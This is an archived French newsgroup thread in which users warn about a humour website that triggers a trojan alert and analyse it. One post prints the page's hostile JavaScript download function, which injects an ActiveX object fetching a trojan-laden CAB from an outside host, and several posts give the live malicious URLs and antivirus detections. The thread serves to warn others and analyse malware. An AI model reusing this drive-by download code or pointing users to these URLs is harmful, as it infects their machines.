OVH Cloud OVH Cloud

Attention au lien ci dessous

7 réponses
Avatar
St.Barth
Bonjour,

Sur le ng humour, j'ai trouvé ce lien:

Mais j'ai eu une alerte troyan de mon Av AVP/ KAV 3.5

A ne se connecter *que* par les pro.

http://www.doodie.com/doodieman_buttons.php

J'ai dû deconnecter mon ordi du net pour sortir de la page..( ZA stop all
connections )

Aussi s'il y a un suicidaire..

;o)

Bonne journée,
--
St.Barth

7 réponses

Avatar
rm

Bonjour,


salut,


Sur le ng humour, j'ai trouvé ce lien:

Mais j'ai eu une alerte troyan de mon Av AVP/ KAV 3.5

A ne se connecter *que* par les pro.

http://www.doodie.com/doodieman_buttons.php


j'ai sauté dessus, et je suis pas un pro pourtant ;-)
puisque j'utilise Opera comme navigateur...
ce dernier m'a proposé de télécharger l'archive fkfkdsae.cab
ce que j'ai accepté de bonne grâce, curieux que je suis.
cette archive contient un .inf et un .dll qui semble être un contrôle
activeX...
http://www.kaspersky.com/remoteviruschk indique rapidement :
fkfkdsae.cab/ATPartners.dll - infected by TrojanDownloader.Win32.Rameh.c
et google mène là :
http://www.pestpatrol.com/PestInfo/w/win32_trojandownloader_rameh_c_trojan.asp

vala, banal...


J'ai dû deconnecter mon ordi du net pour sortir de la page..( ZA stop all
connections )


c'est effectivement étudié pour le navigateur Microsoft Outlook Express que
tu utilises encore...


Aussi s'il y a un suicidaire..


faut pas exagérer, ce truc là n'est pas si horrible que ça :-)))

@+
--
rm

Avatar
St.Barth

j'ai sauté dessus, et je suis pas un pro pourtant ;-)


Courageux qd même ;-)

puisque j'utilise Opera comme navigateur...
ce dernier m'a proposé de télécharger l'archive fkfkdsae.cab
ce que j'ai accepté de bonne grâce, curieux que je suis.
cette archive contient un .inf et un .dll qui semble être un contrôle
activeX...
http://www.kaspersky.com/remoteviruschk indique rapidement :
fkfkdsae.cab/ATPartners.dll - infected by
TrojanDownloader.Win32.Rameh.c et google mène là :

http://www.pestpatrol.com/PestInfo/w/win32_trojandownloader_rameh_c_trojan.asp


vala, banal...

c'est effectivement étudié pour le navigateur Microsoft Outlook
Express que tu utilises encore...


Aussi s'il y a un suicidaire..


faut pas exagérer, ce truc là n'est pas si horrible que ça :-)))

@+


Heu d'aprés ce que tu dis ce n'est pas top non plus ce
"trojan-downloader"

Bon, je l'ai échappé belle quand_ même.

J'avais beau presser non pour le téléchargement, il continuait quand même
:-(

Merci de ce que tu as fait !

Bonne journée,


--
St.Barth


Avatar
Steph
Bonjour,

Sur le ng humour, j'ai trouvé ce lien:

Mais j'ai eu une alerte troyan de mon Av AVP/ KAV 3.5

A ne se connecter *que* par les pro.


ou avec un autre navigateur que IE ;)

http://www.doodie.com/doodieman_buttons.php


En regardant le source, on voit que çà charge un js distant:
<http://www.addictivetechnologies.net/dm0/js/Confirmfkfkdsae.js>
qui essaie de faire télécharger un:
<http://www.addictivetechnologies.net/DM0/cab/fkfkdsae.cab>
Ce cab contient une ATPartners.dll vérolée par
TrojanDownloader.Win32.Rameh.c

--
Steph
Enlever l'.adressebidon.invalid pour m'écrire

Avatar
Filip Supera
St.Barth wrote:
Bonjour,

Sur le ng humour, j'ai trouvé ce lien:

Mais j'ai eu une alerte troyan de mon Av AVP/ KAV 3.5

A ne se connecter *que* par les pro.

http://www.doodie.com/doodieman_buttons.php

J'ai dû deconnecter mon ordi du net pour sortir de la page..( ZA stop all
connections )

Aussi s'il y a un suicidaire..


Avec FireFox, ça donne ça dans la console Javascript :

Error: netscape.softupdate has no properties
Source File:
http://www.addictivetechnologies.net/dm0/js/Confirmfkfkdsae.js
Line: 42

L'eereur se produit à l'éxécution d'une fonction Javascript qui a été
consciencieusement écrite pour télécharger le fichier 'virussé' :

function start_download()
{
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
if ( navigator.platform && navigator.platform != 'Win32' )
{
//alert("Sorry, your browser is not WIN32 Compatible");
}

if (bname == 'Microsoft Internet Explorer' && bver >= 2)
{
document_code = '<html><head>n';
document_code += '</head><body>n';
document_code += '<object
onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/fkfkdsae.cab"
HEIGHT=0 WIDTH=0></object>n';
document_code += '</body></html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
}
else if (bname == 'Netscape' && bver >= 4)
{
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled)
{
//trigger.StartSoftwareUpdate(exepath,
trigger.DEFAULT_MODE)
}
else
{
location.replace(exepath);
}
}
else
{
location.replace(exepath);
}

}

Avatar
Filip Supera
St.Barth wrote:
Bonjour,

Sur le ng humour, j'ai trouvé ce lien:

Mais j'ai eu une alerte troyan de mon Av AVP/ KAV 3.5

A ne se connecter *que* par les pro.

http://www.doodie.com/doodieman_buttons.php

J'ai dû deconnecter mon ordi du net pour sortir de la page..( ZA stop all
connections )

Aussi s'il y a un suicidaire..

;o)

Bonne journée,



Selon Antivir, http://www.addictivetechnologies.net/DM0/cab/fkfkdsae.cab :
Le fichier contient : Trojan horse TR/Small.GS.2

Selon BDC/Linux-Console v7.0 (build 2490)
/tmp/a0997056b209e8bd.scan//fkfkdsae.cab=>ATPartners.dll infected: Le
fichier contient : Trojan.Downloader.Rameh.C

Je ne sais pas s'il s'agit du même truc ou si le fichier cab contient
plusieurs saloperies.

Avatar
rm

FIREFOX par exemple, pour ne pas le citer.... :D


ou OPERA7, Lynx, OffByOne, Safari, Konkeror et d'autres, pour les citer...

@+
--
rm

Avatar
joke0
Salut,

Filip Supera:
http://www.addictivetechnologies.net/dm0/js/Confirmfkfkdsae.js


fkfkdsae.cab/ATPartners.dll infected: TrojanDownloader.Win32.Rameh.c
fkfkdsae.exe infected: TrojanDropper.Win32.Small.gt

Le dropper largue le downloader.

--
joke0